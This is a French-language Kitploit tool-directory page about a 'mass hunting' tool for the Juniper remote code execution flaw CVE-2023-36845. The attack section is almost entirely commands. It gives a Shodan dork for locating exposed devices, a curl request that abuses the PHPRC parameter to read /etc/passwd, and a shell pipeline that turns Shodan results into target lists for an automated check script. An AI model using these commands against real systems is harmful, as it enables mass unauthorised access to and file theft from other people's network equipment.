Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Juniper-CVE-2023-36845-Mass-Hunting — Juniper RCE (Exécution de code à distance) CVE-2023-36845 est une vulnérabilité identifiée dans le logiciel de Juniper. Ce défaut particulier permet l'exécution de code à distance, ce qui signifie qu'un attaquant pourrait exécuter du code arbitraire sur un système sans avoir besoin d'un accès physique à l'appareil. | Kitploit
Outils/GitHubGitHub/jahithoque/juniper-cve-2023-36845-mass-hunting
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubjahithoque/juniper-cve-2023-36845-mass-hunting

Juniper-CVE-2023-36845-Mass-Hunting

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
12il y a 2 ansPas encore vérifié

À propos

Juniper RCE (Exécution de code à distance) CVE-2023-36845 est une vulnérabilité identifiée dans le logiciel de Juniper. Ce défaut particulier permet l'exécution de code à distance, ce qui signifie qu'un attaquant pourrait exécuter du code arbitraire sur un système sans avoir besoin d'un accès physique à l'appareil.

Partager

Juniper-CVE-2023-36845-Mass-Hunting

Juniper RCE (Remote Code Execution) CVE-2023-36845 est une vulnérabilité identifiée dans le logiciel Juniper. Cette faille particulière permet l'exécution de code à distance, ce qui signifie qu'un attaquant pourrait exécuter du code arbitraire sur un système sans avoir besoin d'un accès physique à l'appareil.

Comment trouver :

Shodan dork: http.favicon.hash:2141724739

utilisez avec d'autres dorks pertinents tels que les certificats SSL, le nom de l'organisation, etc. pour une recherche plus ciblée.

Exploitation pour un seul hôte :

curl -k https://$IP/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'

Automatisation :

└─# shodan download Juniper 'http.favicon.hash:2141724739 ssl:domain.com’ #download from shodan

└─# shodan parse Juniper.json.gz --fields ip_str,port >unfiltered_IP_Ports.txt

└─# awk '{print $1":"$2}' unfiltered_IP_Ports.txt >juniper-final.txt

└─# ./Juniper-RCE-check.sh -f juniper-final.txt IMAGE

Télécharger l’outil